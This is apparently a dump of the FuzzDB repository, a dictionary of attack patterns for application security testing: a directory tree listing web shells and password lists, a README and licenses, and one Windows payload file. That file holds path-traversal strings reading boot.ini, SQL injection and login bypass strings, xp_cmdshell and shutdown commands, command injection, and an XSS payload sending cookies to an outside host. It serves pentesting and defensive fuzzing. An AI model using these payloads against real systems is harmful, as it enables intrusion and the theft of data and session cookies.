Repository: fuzzdb-project/fuzzdb
Branch: master
Commit: 5656ab25dc6b
Files: 375
Total size: 15.5 MB

Directory structure:
gitextract_ea3otx92/
├── .gitignore
├── README.md
├── _copyright.txt
├── attack/
│   ├── README.md
│   ├── all-attacks/
│   │   ├── all-attacks-unix.txt
│   │   ├── all-attacks-win.txt
│   │   └── all-attacks-xplatform.txt
│   ├── authentication/
│   │   ├── README.md
│   │   └── php_magic_hashes.fuzz.txt
│   ├── business-logic/
│   │   ├── CommonDebugParamNames.txt
│   │   ├── CommonMethodNames.txt
│   │   └── DebugParams.Json.fuzz.txt
│   ├── control-chars/
│   │   ├── HexValsAllBytes.txt
│   │   ├── NullByteRepresentations.txt
│   │   ├── imessage.txt
│   │   ├── terminal-escape-codes.txt
│   │   └── true.txt
│   ├── disclosure-directory/
│   │   └── directory-indexing-generic.txt
│   ├── disclosure-localpaths/
│   │   └── unix/
│   │       └── common-unix-httpd-log-locations.txt
│   ├── disclosure-source/
│   │   ├── README.md
│   │   ├── source-disc-cmd-exec-traversal.txt
│   │   ├── source-disclosure-generic.txt
│   │   └── source-disclosure-microsoft.txt
│   ├── email/
│   │   ├── invalid-email-addresses.txt
│   │   └── valid-email-addresses.txt
│   ├── file-upload/
│   │   ├── README.md
│   │   ├── alt-extensions-asp.txt
│   │   ├── alt-extensions-coldfusion.txt
│   │   ├── alt-extensions-jsp.txt
│   │   ├── alt-extensions-perl.txt
│   │   ├── alt-extensions-php.txt
│   │   ├── file-ul-filter-bypass-commonly-writable-directories.txt
│   │   ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
│   │   ├── file-ul-filter-bypass-microsoft-asp.txt
│   │   ├── file-ul-filter-bypass-ms-php.txt
│   │   ├── file-ul-filter-bypass-x-platform-generic.txt
│   │   ├── file-ul-filter-bypass-x-platform-php.txt
│   │   ├── invalid-filenames-linux.txt
│   │   ├── invalid-filenames-microsoft.txt
│   │   ├── invalid-filesystem-chars-microsoft.txt
│   │   ├── invalid-filesystem-chars-osx.txt
│   │   └── malicious-images/
│   │       ├── README.md
│   │       ├── eicar.com.txt
│   │       └── xssproject.swf
│   ├── format-strings/
│   │   └── format-strings.txt
│   ├── html_js_fuzz/
│   │   ├── HTML5sec_Injections.txt
│   │   ├── html_attributes.txt
│   │   ├── html_tags.txt
│   │   ├── javascript_events.txt
│   │   ├── js_inject.txt
│   │   └── quotationmarks.txt
│   ├── http-protocol/
│   │   ├── README.md
│   │   ├── crlf-injection.txt
│   │   ├── docs.http-method-defs.html
│   │   ├── hpp.txt
│   │   ├── http-header-cache-poison.txt
│   │   ├── http-protocol-methods.txt
│   │   ├── http-request-header-field-names.txt
│   │   ├── http-response-header-field-names.txt
│   │   ├── known-uri-types.txt
│   │   └── user-agents.txt
│   ├── integer-overflow/
│   │   └── integer-overflows.txt
│   ├── ip/
│   │   └── localhost.txt
│   ├── json/
│   │   └── JSON_Fuzzing.txt
│   ├── ldap/
│   │   ├── README.md
│   │   └── ldap-injection.txt
│   ├── lfi/
│   │   ├── JHADDIX_LFI.txt
│   │   ├── README.md
│   │   ├── common-ms-httpd-log-locations.txt
│   │   └── common-unix-httpd-log-locations.txt
│   ├── mimetypes/
│   │   └── MimeTypes.txt
│   ├── no-sql-injection/
│   │   ├── Readme.md
│   │   └── mongodb.txt
│   ├── os-cmd-execution/
│   │   ├── Commands-Linux.txt
│   │   ├── Commands-OSX.txt
│   │   ├── Commands-Windows.txt
│   │   ├── Commands-WindowsPowershell.txt
│   │   ├── OSCommandInject.Windows.txt
│   │   ├── README.md
│   │   ├── command-execution-unix.txt
│   │   ├── command-injection-template.txt
│   │   ├── shell-delimiters.txt
│   │   ├── shell-operators.txt
│   │   ├── source-disc-cmd-exec-traversal.txt
│   │   ├── useful-commands-unix.txt
│   │   └── useful-commands-windows.txt
│   ├── os-dir-indexing/
│   │   └── directory-indexing.txt
│   ├── path-traversal/
│   │   ├── README.md
│   │   ├── path-traversal-windows.txt
│   │   └── traversals-8-deep-exotic-encoding.txt
│   ├── redirect/
│   │   ├── README.md
│   │   ├── redirect-injection-template.txt
│   │   └── redirect-urls-template.txt
│   ├── rfi/
│   │   ├── README.md
│   │   └── rfi.txt
│   ├── server-side-include/
│   │   └── server-side-includes-generic.txt
│   ├── sql-injection/
│   │   ├── detect/
│   │   │   ├── GenericBlind.txt
│   │   │   ├── Generic_SQLI.txt
│   │   │   ├── MSSQL.txt
│   │   │   ├── MSSQL_blind.txt
│   │   │   ├── MySQL.txt
│   │   │   ├── MySQL_MSSQL.txt
│   │   │   ├── README.md
│   │   │   ├── oracle.txt
│   │   │   └── xplatform.txt
│   │   ├── exploit/
│   │   │   ├── README.md
│   │   │   ├── db2-enumeration.txt
│   │   │   ├── ms-sql-enumeration.txt
│   │   │   ├── mysql-injection-login-bypass.txt
│   │   │   ├── mysql-read-local-files.txt
│   │   │   └── postgres-enumeration.txt
│   │   └── payloads-sql-blind/
│   │       ├── README.md
│   │       ├── payloads-sql-blind-MSSQL-INSERT.txt
│   │       ├── payloads-sql-blind-MSSQL-WHERE.txt
│   │       ├── payloads-sql-blind-MySQL-INSERT.txt
│   │       ├── payloads-sql-blind-MySQL-ORDER_BY.txt
│   │       └── payloads-sql-blind-MySQL-WHERE.txt
│   ├── string-expansion/
│   │   └── shell-expansion.txt
│   ├── unicode/
│   │   ├── README.md
│   │   ├── corrupted.txt
│   │   ├── emoji.txt
│   │   ├── japanese-emoticon.txt
│   │   ├── naughty-unicode.txt
│   │   ├── regionalindicators.txt
│   │   ├── right-to-left.txt
│   │   ├── specialchars.txt
│   │   ├── two-byte-chars.txt
│   │   └── upsidedown.txt
│   ├── xml/
│   │   └── xml-attacks.txt
│   ├── xpath/
│   │   ├── README.md
│   │   └── xpath-injection.txt
│   └── xss/
│       ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt
│       ├── README.md
│       ├── XSSPolyglot.txt
│       ├── all-encodings-of-lt.txt
│       ├── default-javascript-event-attributes.txt
│       ├── html-event-attributes.txt
│       ├── test.xxe
│       ├── xss-other.txt
│       ├── xss-rsnake.txt
│       └── xss-uri.txt
├── discovery/
│   ├── URI_SCHEMES/
│   │   └── IANA_registerd_URI_schemes.txt
│   ├── UserAgent/
│   │   ├── UserAgentListCommon.txt
│   │   ├── UserAgentListLarge.txt
│   │   └── UserAgents.txt
│   ├── WebSocket/
│   │   └── WebSocket-subprotocols.txt
│   ├── common-methods/
│   │   └── common-methods.txt
│   ├── dns/
│   │   ├── CcTLD.txt
│   │   ├── alexaTop1mAXFRcommonSubdomains.txt
│   │   ├── dnsmapCommonSubdomains.txt
│   │   └── gTLD.txt
│   └── predictable-filepaths/
│       ├── KitchensinkDirectories.txt
│       ├── Randomfiles.txt
│       ├── UnixDotfiles.txt
│       ├── backdoors/
│       │   ├── ASP_CommonBackdoors.txt
│       │   ├── bot_control_panels.txt
│       │   └── shells.txt
│       ├── cgi/
│       │   ├── CGI_HTTP_POST.txt
│       │   ├── CGI_HTTP_POST_Windows.txt
│       │   ├── CGI_Microsoft.txt
│       │   └── CGI_XPlatform.txt
│       ├── cms/
│       │   ├── README.md
│       │   ├── drupal_plugins.txt
│       │   ├── drupal_themes.txt
│       │   ├── joomla_plugins.txt
│       │   ├── joomla_themes.txt
│       │   ├── php-nuke.txt
│       │   ├── wordpress.txt
│       │   ├── wp_common_theme_files.txt
│       │   ├── wp_plugins.txt
│       │   ├── wp_plugins_full.txt
│       │   ├── wp_plugins_top225.txt
│       │   ├── wp_themes.readme
│       │   └── wp_themes.txt
│       ├── filename-dirname-bruteforce/
│       │   ├── 3CharExtBrute.txt
│       │   ├── CommonWebExtensions.txt
│       │   ├── Extensions.Backup.txt
│       │   ├── Extensions.Common.txt
│       │   ├── Extensions.Compressed.txt
│       │   ├── Extensions.Mostcommon.txt
│       │   ├── Extensions.Skipfish.txt
│       │   ├── WordlistSkipfish.txt
│       │   ├── copy_of.txt
│       │   ├── raft-large-directories-lowercase.txt
│       │   ├── raft-large-directories.txt
│       │   ├── raft-large-extensions-lowercase.txt
│       │   ├── raft-large-extensions.txt
│       │   ├── raft-large-files-lowercase.txt
│       │   ├── raft-large-files.txt
│       │   ├── raft-large-words-lowercase.txt
│       │   ├── raft-large-words.txt
│       │   ├── raft-medium-directories-lowercase.txt
│       │   ├── raft-medium-directories.txt
│       │   ├── raft-medium-extensions-lowercase.txt
│       │   ├── raft-medium-extensions.txt
│       │   ├── raft-medium-files-lowercase.txt
│       │   ├── raft-medium-files.txt
│       │   ├── raft-medium-words-lowercase.txt
│       │   ├── raft-medium-words.txt
│       │   ├── raft-small-directories-lowercase.txt
│       │   ├── raft-small-directories.txt
│       │   ├── raft-small-extensions-lowercase.txt
│       │   ├── raft-small-extensions.txt
│       │   ├── raft-small-files-lowercase.txt
│       │   ├── raft-small-files.txt
│       │   ├── raft-small-words-lowercase.txt
│       │   ├── raft-small-words.txt
│       │   ├── spanish.txt
│       │   ├── test_demo.txt
│       │   └── upload_variants.txt
│       ├── login-file-locations/
│       │   ├── Logins.txt
│       │   ├── cfm.txt
│       │   ├── html.txt
│       │   ├── jsp.txt
│       │   ├── php.txt
│       │   ├── windows-asp.txt
│       │   └── windows-aspx.txt
│       ├── password-file-locations/
│       │   └── Passwords.txt
│       ├── php/
│       │   ├── PHP.txt
│       │   └── PHP_CommonBackdoors.txt
│       ├── proxy-conf.txt
│       ├── tftp.txt
│       ├── webservers-appservers/
│       │   ├── ADFS.txt
│       │   ├── AdobeXML.txt
│       │   ├── Apache.txt
│       │   ├── ApacheTomcat.txt
│       │   ├── Apache_Axis.txt
│       │   ├── ColdFusion.txt
│       │   ├── FatwireCMS.txt
│       │   ├── Frontpage.txt
│       │   ├── HP_System_Mgmt_Homepage.txt
│       │   ├── HTTP_POST_Microsoft.txt
│       │   ├── Hyperion.txt
│       │   ├── IIS.txt
│       │   ├── JBoss.txt
│       │   ├── JRun.txt
│       │   ├── JavaServlets_Common.txt
│       │   ├── Joomla_exploitable.txt
│       │   ├── LotusNotes.txt
│       │   ├── Netware.txt
│       │   ├── Oracle9i.txt
│       │   ├── OracleAppServer.txt
│       │   ├── README.md
│       │   ├── Ruby_Rails.txt
│       │   ├── SAP.txt
│       │   ├── Sharepoint.txt
│       │   ├── SiteMinder.txt
│       │   ├── SunAppServerGlassfish.txt
│       │   ├── SuniPlanet.txt
│       │   ├── Vignette.txt
│       │   ├── Weblogic.txt
│       │   └── Websphere.txt
│       └── wellknown-rfc5785.txt
├── docs/
│   ├── attack-docs/
│   │   ├── rfi-cheatsheet.html
│   │   ├── source-directory-file-indexing-cheatsheet.html
│   │   ├── sqli/
│   │   │   └── docs.sql_injection_cheatsheet.html
│   │   ├── waf-bypass/
│   │   │   └── regexp-security-cheatsheet.md
│   │   └── xss/
│   │       └── docs.wasc-scriptmapping/
│   │           ├── ScriptMapping_Release_26Nov2007.html
│   │           └── license.txt
│   └── misc/
│       ├── KL0209LIT_fffap.html
│       └── htmlcodes-cheatsheet.htm
├── regex/
│   ├── README.md
│   ├── amazon.txt
│   ├── breakpoint-ignores.txt
│   ├── errors.txt
│   ├── nsa-wordlist.txt
│   ├── pii.readme.txt
│   ├── pii.txt
│   └── sessionid.txt
├── web-backdoors/
│   ├── README.md
│   ├── asp/
│   │   ├── cmd-asp-5.1.asp
│   │   ├── cmd.asmx
│   │   ├── cmd.asp
│   │   ├── cmd.aspx
│   │   ├── cmdasp.asp
│   │   ├── cmdasp.aspx
│   │   ├── dns.asp
│   │   ├── file.asp
│   │   ├── list.asp
│   │   ├── list.txt
│   │   ├── ntdaddy.asp
│   │   ├── proxy.asp
│   │   ├── shell.asp
│   │   ├── shell.aspx
│   │   └── up.asp
│   ├── c/
│   │   └── cmd.c
│   ├── cfm/
│   │   ├── cfExec.cfm
│   │   ├── cfSQL.cfm
│   │   ├── cmd.cfm
│   │   └── shell.cfm
│   ├── jsp/
│   │   ├── CmdServlet.java
│   │   ├── ListServlet.java
│   │   ├── UpServlet.java
│   │   ├── browser.jsp
│   │   ├── cmd.jsp
│   │   ├── cmdjsp.jsp
│   │   ├── jsp-reverse.jsp
│   │   ├── laudanum/
│   │   │   ├── cmd.war
│   │   │   ├── makewar.sh
│   │   │   └── warfiles/
│   │   │       ├── META-INF/
│   │   │       │   └── MANIFEST.MF
│   │   │       ├── WEB-INF/
│   │   │       │   └── web.xml
│   │   │       └── cmd.jsp
│   │   ├── list.jsp
│   │   ├── simple.jsp
│   │   ├── up.jsp
│   │   └── win32/
│   │       ├── cmd_win32.jsp
│   │       └── up_win32.jsp
│   ├── php/
│   │   ├── cmd.php
│   │   ├── dns.php
│   │   ├── file.php
│   │   ├── host.php
│   │   ├── killnc.php
│   │   ├── list.php
│   │   ├── php-backdoor.php
│   │   ├── php-reverse-shell.php
│   │   ├── proxy.php
│   │   ├── shell.php
│   │   ├── simple-backdoor.php
│   │   ├── tiny.php
│   │   └── up.php
│   ├── pl-cgi/
│   │   ├── cmd.pl
│   │   ├── list.pl
│   │   ├── perlcmd.cgi
│   │   └── up.pl
│   ├── servlet/
│   │   ├── CmdServlet.java
│   │   ├── ListServlet.java
│   │   └── UpServlet.java
│   ├── sh/
│   │   ├── cmd.sh
│   │   ├── list.sh
│   │   └── up.sh
│   └── wordpress/
│       ├── laudanum.php
│       └── templates/
│           ├── README.md
│           ├── dns.php
│           ├── file.php
│           ├── host.php
│           ├── ipcheck.php
│           ├── killnc.php
│           ├── php-reverse-shell.php
│           ├── proxy.php
│           ├── settings.php
│           └── shell.php
├── wordlists-misc/
│   ├── accidental_profanity.txt
│   ├── common-http-ports.txt
│   ├── numeric.txt
│   ├── resolvers.txt
│   ├── us_cities.txt
│   ├── wordlist-alphanumeric-case.txt
│   ├── wordlist-common-snmp-community-strings.txt
│   └── wordlist-dna.txt
└── wordlists-user-passwd/
    ├── db2/
    │   ├── db2_default_pass.txt
    │   ├── db2_default_user.txt
    │   └── db2_default_userpass.txt
    ├── faithwriters.txt
    ├── generic-listpairs/
    │   ├── http_default_pass.txt
    │   ├── http_default_userpass.txt
    │   └── http_default_users.txt
    ├── names/
    │   └── namelist.txt
    ├── oracle/
    │   ├── _hci_oracle_passwords.txt
    │   ├── _oracle_default_passwords.txt
    │   ├── oracle_login_password.txt
    │   ├── oracle_logins.txt
    │   └── oracle_passwords.txt
    ├── passwds/
    │   ├── john.txt
    │   ├── phpbb.txt
    │   ├── twitter.txt
    │   └── weaksauce.txt
    ├── postgres/
    │   ├── postgres_default_pass.txt
    │   ├── postgres_default_user.txt
    │   └── postgres_default_userpass.txt
    ├── readme.txt
    ├── tomcat/
    │   ├── tomcat_mgr_default_pass.txt
    │   ├── tomcat_mgr_default_userpass.txt
    │   └── tomcat_mgr_default_users.txt
    └── unix-os/
        ├── unix_passwords.txt
        └── unix_users.txt

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
*.DS_Store
================================================
FILE: README.md
================================================
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses.

**Attack Patterns -** FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. These patterns, categorized by attack and, where appropriate, platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, HTTP header CRLF injection, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs that [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).

**Discovery -** The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths). FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.

https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery

**Response Analysis -** Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex). FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.

**Other useful stuff -** Webshells in different languages, common password and username lists, and some handy wordlists.

**Documentation -** Many directories contain a README.md file with usage notes. A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included.

### Usage tips for pentesting with FuzzDB ###

https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints

### How people use FuzzDB ###

FuzzDB is like an application security scanner, without the scanner. Some ways to use FuzzDB:

* Website and application service black-box penetration testing with
  * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension
  * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner
  * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy
* To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more
* Inside custom tools for testing software and application protocols
* Crafting security test cases for GUI or command line software with standard test automation tools
* Incorporating into other Open Source software or commercial products
* In training materials and documentation
* To learn about software exploitation techniques
* To improve your security testing product or service

### How were the patterns collected? ###

Many, many hours of research and pentesting.

And

* analysis of default app installs
* analysis of system and application documentation
* analysis of error messages
* researching old web exploits for repeatable attack strings
* scraping scanner payloads from http logs
* various books, articles, blog posts, mailing list threads
* other open source fuzzers and pentest tools

and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors

### Places you can find FuzzDB ###

Other security tools and projects that incorporate FuzzDB in whole or part

* OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
* SecLists https://github.com/danielmiessler/SecLists
* TrustedSec Pentesters Framework https://github.com/trustedsec/ptf
* Rapid7 Metasploit https://github.com/rapid7/metasploit-framework
* Portswigger Burp Suite http://portswigger.net
* Protofuzz https://github.com/trailofbits/protofuzz
* BlackArch Linux https://www.blackarch.org/
* ArchStrike Linux https://archstrike.org/

### Download ###

**Preferred method is to check out sources via git, new payloads are added frequently**

```
git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1
```

While in the FuzzDB dir, you can update your local repo with the command

```
git pull
```

This Stack Overflow answer gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595

You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip)

Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk.
### Who ###

FuzzDB was created by Adam Muntner (amuntner @ gmail.com)

FuzzDB (c) Copyright Adam Muntner, 2010-2019

Portions copyrighted by others, as noted in commit comments and README.md files.

The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know.

Submissions are always welcome!

Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/)

================================================
FILE: _copyright.txt
================================================
Copyright (c) 2010-2019, Adam Muntner
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

Neither the name of fuzzdb nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

Licensed under Creative Commons - By Attribution
see http://creativecommons.org/licenses/by/3.0/legalcode

----

contains dictionaries from Skipfish
Copyright 2010 Michal Zalewski

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

----

The MIT License (MIT)

Copyright (c) 2015 Max Woolf

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

================================================
FILE: attack/README.md
================================================

FuzzDB Attack Patterns

**WAF Evasion**
* Regexp security Cheatsheet
* Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md

================================================
FILE: attack/all-attacks/all-attacks-unix.txt
================================================
================================================
FILE: attack/all-attacks/all-attacks-win.txt
================================================
# a wide sample of malicious input for windows targets
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini %0d%0aX-Injection-Header:%20AttackValue !@#0%^#0##018387@#0^^**(() %01%02%03%04%0a%0d%0aADSF /,%ENV,/ <!--#exec%20cmd="dir"--> <!--#exec%20cmd="dir"--> % # * } ; / \ \\ \\/ \\\\* \\\\?\\ < < < < < << <<< | || ` - -- *| ^' \' /' @' (') {'} ['] *' #' !' !@#$%%^#$%#$@#$%$$@#$%^^**(() %01%02%03%04%0a%0d%0aADSF \t "\t" #xD #xA #xD#xA #xA#xD /%00/ %00/ %00 xxx

yyy "> < '> '> \";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert "> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()} ' " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! 
%21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ','')); phpinfo(); exit;/* var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> SCRIPT]]>alert('XSS');/SCRIPT]]> ]>&xxe; ]>&xxe; ]>&xxe; ]>&xxe; ]]> <IMG SRC="javascript:alert('XSS')"> XSS ' '-- ' or 1=1-- 1 or 1=1-- ' or 1 in (@@version)-- 1 or 1 in (@@version)-- '; waitfor delay '0:30:0'-- 1; waitfor delay '0:30:0'-- '||Utl_Http.request('http://') from dual-- 1||Utl_Http.request('http://') from dual-- xsstest xsstest%00"<>' )))))))))) ../../../../../../../../../../boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini ../../../../../../../../../../windows/win.ini ..\..\..\..\..\..\..\..\..\..\windows\win.ini || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & | ping -i 30 127.0.0.1 | | ping -n 30 127.0.0.1 | & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ; ping 127.0.0.1 ; %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` ;echo 111111 echo 111111 response.write 111111 :response.write 111111 http:/// %0aCc: %0d%0aCc: %0aBcc: %0d%0aBcc: %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a # known cross platform source Code, file disclosure attack patterns - append after file or dir path %70 .%E2%73%70 %2e0 %2e . 
